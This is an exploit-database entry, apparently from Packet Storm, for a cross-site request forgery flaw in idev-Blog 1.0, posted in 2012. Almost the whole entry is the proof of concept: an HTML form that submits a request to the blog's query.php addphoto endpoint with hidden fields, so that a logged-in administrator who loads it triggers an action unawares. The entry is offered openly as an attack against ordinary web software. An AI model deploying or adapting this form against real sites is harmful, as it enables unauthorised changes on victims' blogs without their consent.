Lucene search

K
packetstormJonturk75PACKETSTORM:111569
HistoryApr 05, 2012 - 12:00 a.m.

idev-Blog 1.0 Cross Site Request Forgery

2012-04-0500:00:00
Jonturk75
packetstormsecurity.com
15
`# Exploit Title: idev-Blog 1.0 CSRF  
# Author: Jonturk75  
# Vendor or Software Link: http://idevspot.com/  
# Category:: webapps  
# Demo : http://idevspot.com/demos/idev-blog/admin/  
# Greetz: Inj3ct0r Exploit DataBase 1337day.com  
  
  
<form action="../library/query.php?addphoto=1" method="post" name="form1" enctype="multipart/form-data" id="form1">  
<input name="EMAIL" class="textarea100" value="[email protected]" type="hidden">  
<input name="AFFID" class="textarea100" value="" type="text">  
<input name="Submit" value="Submit" type="submit">  
</form>  
  
  
`